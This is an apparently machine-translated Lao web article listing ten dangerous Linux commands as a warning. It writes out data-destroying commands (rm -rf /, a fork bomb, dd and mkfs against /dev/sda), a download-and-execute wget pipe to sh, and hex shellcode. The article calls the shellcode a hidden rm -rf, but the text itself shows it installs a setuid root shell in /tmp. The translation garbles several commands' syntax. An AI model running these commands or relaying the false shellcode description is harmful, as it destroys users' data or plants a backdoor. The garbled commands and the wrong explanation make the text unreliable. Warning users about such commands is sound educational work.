10 ຄຳ ສັ່ງທີ່ເປັນອັນຕະລາຍທີ່ສຸດ - ທ່ານບໍ່ຄວນປະຕິບັດງານໃນ Linux


ເສັ້ນຄໍາສັ່ງ Linux ແມ່ນຜະລິດຕະພັນ, ມີປະໂຫຍດແລະ ໜ້າ ສົນໃຈແຕ່ບາງຄັ້ງມັນອາດຈະເປັນອັນຕະລາຍຫຼາຍໂດຍສະເພາະເມື່ອທ່ານບໍ່ແນ່ໃຈວ່າທ່ານກໍາລັງເຮັດຫຍັງຢູ່. ບົດຂຽນນີ້ບໍ່ໄດ້ມີຈຸດປະສົງທີ່ຈະເຮັດໃຫ້ທ່ານໂກດແຄ້ນ Linux ຫລືເສັ້ນ ຄຳ ສັ່ງ Linux. ພວກເຮົາພຽງແຕ່ຕ້ອງການໃຫ້ທ່ານຮູ້ບາງ ຄຳ ສັ່ງທີ່ທ່ານຄວນຄິດສອງຄັ້ງກ່ອນທີ່ທ່ານຈະປະຕິບັດ ຄຳ ສັ່ງດັ່ງກ່າວ.

1. rm -rf ຄຳ ສັ່ງ

ຄໍາສັ່ງ rm -rf ແມ່ນຫນຶ່ງໃນວິທີທີ່ໄວທີ່ສຸດທີ່ຈະລຶບໂຟເດີແລະເນື້ອຫາຂອງມັນ. ແຕ່ typo ເລັກນ້ອຍຫຼືຄວາມໂງ່ຈ້າອາດຈະສົ່ງຜົນໃຫ້ຄວາມເສຍຫາຍຂອງລະບົບທີ່ບໍ່ສາມາດຄົ້ນຫາໄດ້. ບາງທາງເລືອກທີ່ໃຊ້ກັບ ຄຳ ສັ່ງ rm ແມ່ນ.

<

  • ຄຳ ສັ່ງ rm ໃນ Linux ຖືກໃຊ້ເພື່ອລຶບໄຟລ໌.
  • rm -r ຄຳ ສັ່ງຈະລຶບແຟ້ມຂໍ້ມູນຄືນ, ແມ້ກະທັ້ງໂຟນເດີທີ່ຫວ່າງ.
  • rm -f ຄຳ ສັ່ງລົບອອກ 'ອ່ານພຽງແຕ່ເອກະສານ' ໂດຍບໍ່ຕ້ອງຖາມ.
  • rm -rf /: ບັງຄັບໃຫ້ລຶບທຸກສິ່ງທຸກຢ່າງໄວ້ໃນລະບົບຮາກ.
  • rm -rf *: ບັງຄັບໃຫ້ລຶບທຸກສິ່ງທຸກຢ່າງໃນໄດເລກະທໍລີ/ລະບົບເຮັດວຽກໃນປະຈຸບັນ.
  • rm -rf. : ບັງຄັບການລຶບໂຟນເດີແລະແຟ້ມຍ່ອຍໃນປະຈຸບັນ.
  • ເພາະສະນັ້ນ, ຈົ່ງລະມັດລະວັງໃນເວລາທີ່ທ່ານກໍາລັງປະຕິບັດຄໍາສັ່ງ rm -rf. ເພື່ອເອົາຊະນະການລຶບເອກະສານໂດຍບັງເອີນໂດຍ ຄຳ ສັ່ງ ‘rm’, ສ້າງນາມແຝງຂອງ ຄຳ ສັ່ງ ‘rm’ ເປັນ ‘rm -i’ ໃນເອກະສານ“ .bashrc”, ມັນຈະຂໍໃຫ້ທ່ານຢືນຢັນທຸກໆການລຶບ.

    2. :() {: |: &};: ຄຳ ສັ່ງ

    ຂ້າງເທິງນີ້ແມ່ນຕົວຈິງແລ້ວແມ່ນລູກລະເບີດປະສາດ. ມັນ ດຳ ເນີນງານໂດຍການ ກຳ ນົດ ໜ້າ ທີ່ທີ່ເອີ້ນວ່າ ‘:‘ ເຊິ່ງເອີ້ນຕົວມັນເອງສອງຄັ້ງ, ຄັ້ງ ໜຶ່ງ ຢູ່ທາງ ໜ້າ ແລະອີກເບື້ອງ ໜຶ່ງ. ມັນຍັງສືບຕໍ່ປະຕິບັດອີກເທື່ອ ໜຶ່ງ ແລະອີກຄັ້ງຈົນກວ່າລະບົບຈະ ໝົດ ໄປ.

    :(){:|:&};:

    3. ຄຳ ສັ່ງ>/dev/sda

    ຄຳ ສັ່ງຂ້າງເທິງຂຽນຜົນຂອງ 'ຄຳ ສັ່ງ' ຢູ່ເທິງ block/dev/sda. ຄຳ ສັ່ງຂ້າງເທິງຂຽນຂໍ້ມູນດິບແລະທຸກໄຟລ໌ທີ່ຢູ່ໃນ block ຈະຖືກປ່ຽນແທນດ້ວຍຂໍ້ມູນດິບ, ດັ່ງນັ້ນຈຶ່ງເຮັດໃຫ້ຂໍ້ມູນທັງ ໝົດ ຢູ່ໃນທ່ອນໄມ້ສູນເສຍ.

    4. mv folder/dev/null

    ຄຳ ສັ່ງຂ້າງເທິງນີ້ຈະຍ້າຍ 'ໂຟເດີ' ໄປ/dev/null. ໃນອຸປະກອນ Linux/dev/null ຫຼື null ແມ່ນເອກະສານພິເສດທີ່ຖິ້ມຂໍ້ມູນທັງ ໝົດ ທີ່ຂຽນໃສ່ມັນແລະລາຍງານທີ່ການ ດຳ ເນີນງານຂຽນປະສົບຜົນ ສຳ ເລັດ.

    # mv /home/user/* /dev/null

    ຄຳ ສັ່ງຂ້າງເທິງຈະຍ້າຍເນື້ອຫາທັງ ໝົດ ຂອງໄດເລກະທໍລີ User ໄປ/dev/null, ເຊິ່ງ ໝາຍ ຄວາມວ່າຕົວຈິງທຸກຢ່າງທີ່ຖືກສົ່ງໄປຍັງ blackhole (null).

    5. wget http:// malicious_source -O- | sh

    ຄຳ ສັ່ງຂ້າງເທິງຈະດາວໂຫລດສະຄິບຈາກແຫຼ່ງທີ່ເປັນອັນຕະລາຍແລ້ວປະຕິບັດມັນ. ຄຳ ສັ່ງຂອງ wget ຈະດາວໂຫລດສະຄິບແລະ sh ຈະ ທຳ ງານສະຄິບທີ່ດາວໂຫລດມາ.

    ໝາຍ ເຫດ: ເຈົ້າຄວນຈະຮູ້ຫຼາຍຈາກແຫຼ່ງທີ່ມາຈາກບ່ອນທີ່ເຈົ້າ ກຳ ລັງດາວໂຫລດແພກເກດແລະສະຄິບ. ໃຊ້ສະຄິບ/ໂປແກຼມເຫລົ່ານັ້ນທີ່ດາວໂຫລດມາຈາກແຫຼ່ງທີ່ເຊື່ອຖືໄດ້.

    6. mkfs.ext3/dev/sda

    ຄຳ ສັ່ງຂ້າງເທິງນີ້ຈະຈັດຮູບແບບບລັອກ 'sda' ແລະທ່ານຈະຮູ້ຢ່າງແນ່ນອນວ່າຫລັງຈາກປະຕິບັດ ຄຳ ສັ່ງຂ້າງເທິງນັ້ນຕັນ (Hard Disk Drive) ຂອງທ່ານຈະ ໃໝ່, BRAND NEW! ໂດຍບໍ່ມີຂໍ້ມູນໃດໆ, ເຮັດໃຫ້ລະບົບຂອງທ່ານເຂົ້າສູ່ຂັ້ນຕອນທີ່ບໍ່ສາມາດຄົ້ນຫາໄດ້.

    7. > ແຟ້ມ

    ຄຳ ສັ່ງຂ້າງເທິງແມ່ນໃຊ້ເພື່ອຟອກເນື້ອຫາຂອງແຟ້ມ. ຖ້າ ຄຳ ສັ່ງຂ້າງເທິງນີ້ຖືກປະຕິບັດດ້ວຍ typo ຫຼືຄວາມໂງ່ຈ້າເຊັ່ນ "> xt.conf" ຈະຂຽນເອກະສານການຕັ້ງຄ່າຫລືລະບົບອື່ນຫຼືແຟ້ມການຕັ້ງຄ່າ.

    8. ^foo ^ແຖບ

    ຄຳ ສັ່ງດັ່ງກ່າວດັ່ງທີ່ໄດ້ອະທິບາຍໄວ້ໃນ ຄຳ ສັ່ງ 10 Linux Lesser Known Linux Commands ຂອງພວກເຮົາແມ່ນຖືກ ນຳ ໃຊ້ເພື່ອແກ້ໄຂ ຄຳ ສັ່ງທີ່ແລ່ນຜ່ານມາໂດຍບໍ່ ຈຳ ເປັນຕ້ອງຂຽນ ຄຳ ສັ່ງທັງ ໝົດ ອີກຄັ້ງ. ແຕ່ສິ່ງນີ້ອາດຈະເປັນບັນຫາຖ້າວ່າທ່ານບໍ່ມີຄວາມສ່ຽງໃນການກວດສອບການປ່ຽນແປງຂອງ ຄຳ ສັ່ງເດີມໂດຍໃຊ້ ຄຳ ສັ່ງ ^foo ^bar.

    9. dd ຖ້າ =/dev/ສຸ່ມຂອງ =/dev/sda

    ຄຳ ສັ່ງຂ້າງເທິງຈະເຊັດ block sda ອອກແລະຂຽນຂໍ້ມູນ junk ແບບສຸ່ມໃສ່ block. ແນ່ນອນ! ລະບົບຂອງທ່ານຈະຖືກປ່ອຍໃຫ້ຢູ່ໃນຂັ້ນຕອນທີ່ບໍ່ສອດຄ່ອງແລະບໍ່ສາມາດຄົ້ນຫາໄດ້.

    10. ເຊື່ອງ ຄຳ ສັ່ງ

    ຄຳ ສັ່ງລຸ່ມນີ້ບໍ່ມີຫຍັງນອກ ເໜືອ ຈາກ ຄຳ ສັ່ງ ທຳ ອິດຂ້າງເທິງ (rm -rf). ນີ້ລະຫັດຖືກເຊື່ອງໄວ້ໃນ hex ເພື່ອໃຫ້ຜູ້ໃຊ້ທີ່ບໍ່ຮູ້ຕົວສາມາດຫລອກລວງໄດ້. ການແລ່ນລະຫັດຂ້າງລຸ່ມນີ້ຢູ່ໃນປາຍທາງຂອງທ່ານຈະເຮັດໃຫ້ການແບ່ງປັນສ່ວນແບ່ງຂອງທ່ານຮາກ.

    ຄຳ ສັ່ງນີ້ຢູ່ນີ້ສະແດງໃຫ້ເຫັນວ່າໄພຂົ່ມຂູ່ອາດຈະຖືກປິດບັງແລະບາງຄັ້ງກໍ່ບໍ່ສາມາດກວດພົບໄດ້. ທ່ານຕ້ອງຮູ້ກ່ຽວກັບສິ່ງທີ່ທ່ານ ກຳ ລັງເຮັດແລະຜົນຈະເປັນແນວໃດ. ຢ່າລວບລວມ/ແລ່ນລະຫັດຈາກແຫຼ່ງທີ່ບໍ່ຮູ້ຈັກ.

    char esp[] __attribute__ ((section(“.text”))) /* e.s.p
    release */
    = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
    “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
    “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
    “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
    “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
    “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
    “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    ໝາຍ ເຫດ: ຢ່າປະຕິບັດ ຄຳ ສັ່ງຂ້າງເທິງໃດໆໃນ Linux terminal ຫລື shell ຫຼືຂອງເພື່ອນຫຼືຄອມພິວເຕີຂອງໂຮງຮຽນ. ຖ້າທ່ານຕ້ອງການທົດສອບພວກມັນ, ໃຫ້ພວກມັນແລ່ນຢູ່ໃນເຄື່ອງ virtual. ສິ່ງໃດທີ່ບໍ່ສອດຄ່ອງຫຼືສູນເສຍຂໍ້ມູນ, ເນື່ອງຈາກການປະຕິບັດ ຄຳ ສັ່ງຂ້າງເທິງນີ້ຈະເຮັດໃຫ້ລະບົບຂອງທ່ານເສື່ອມເສຍເຊິ່ງທັງຜູ້ຂຽນບົດຄວາມຫລື Tecmint ບໍ່ມີຄວາມຮັບຜິດຊອບ.

    ດຽວນີ້ ໝົດ ແລ້ວ. ໃນໄວໆນີ້ຂ້ອຍຈະມາອີກເທື່ອ ໜຶ່ງ ດ້ວຍບົດຂຽນທີ່ ໜ້າ ສົນໃຈອີກຢ່າງ ໜຶ່ງ ທີ່ເຈົ້າຈະມັກອ່ານ. ຈົນກ່ວາຫຼັງຈາກນັ້ນ Stay tuned ແລະເຊື່ອມຕໍ່ກັບ Tecmint. ຖ້າທ່ານຮູ້ ຄຳ ສັ່ງ Linux ທີ່ມີຄວາມອັນຕະລາຍອື່ນໆແລະທ່ານຕ້ອງການໃຫ້ພວກເຮົາເພີ່ມເຂົ້າໃນບັນຊີ, ກະລຸນາບອກພວກເຮົາຜ່ານສ່ວນ ຄຳ ເຫັນແລະຢ່າລືມໃຫ້ ຄຳ ຕິຊົມທີ່ມີຄຸນຄ່າຂອງທ່ານ.